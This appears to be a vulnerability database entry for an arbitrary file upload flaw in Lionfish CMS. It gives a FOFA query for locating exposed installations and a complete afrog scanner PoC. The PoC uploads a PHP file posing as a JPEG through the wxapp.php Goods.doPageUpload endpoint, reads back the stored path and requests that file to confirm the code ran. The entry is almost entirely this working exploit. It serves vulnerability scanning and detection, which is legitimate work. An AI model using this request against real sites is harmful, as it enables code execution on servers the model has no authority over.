lionfish-cms-wxapp-php-upload: 狮子鱼 CMS 任意文件上传

日期: 2025-09-01 | 影响软件: lionfish cms wxapp php upload狮子鱼CMS | POC: 已公开

漏洞描述

FOFA: body="/seller.php?s=/Public/login"

PoC代码[已公开]

id: lionfish-cms-wxapp-php-upload

info:
  name: 狮子鱼 CMS 任意文件上传
  author: xpoc,sharecast
  severity: critical
  verified: true
  description: |
    FOFA: body="/seller.php?s=/Public/login"
  reference:
    - https://www.cnblogs.com/KHZ521/p/14782653.html

set:
    r1: randomInt(40000, 44800)
    rboundary: randomLowercase(8)
    randname: randomLowercase(6)
rules:
    r0:
        request:
            method: POST
            path: /wxapp.php?controller=Goods.doPageUpload
            headers:
                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"{{randname}}.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5({{r1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
        expression: response.status == 200 && response.body.bcontains(bytes(".php"))
        output:
            search: '"image_o\":\"https?:\\\\/\\\\/.*?\\/(?P<path>.*?)\"".bsubmatch(response.body)'
            path: replaceAll(search["path"], "\\", "")
    r1:
        request:
            method: GET
            path: /{{path}}
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/lionfish-cms-wxapp-php-upload.yaml

相关漏洞推荐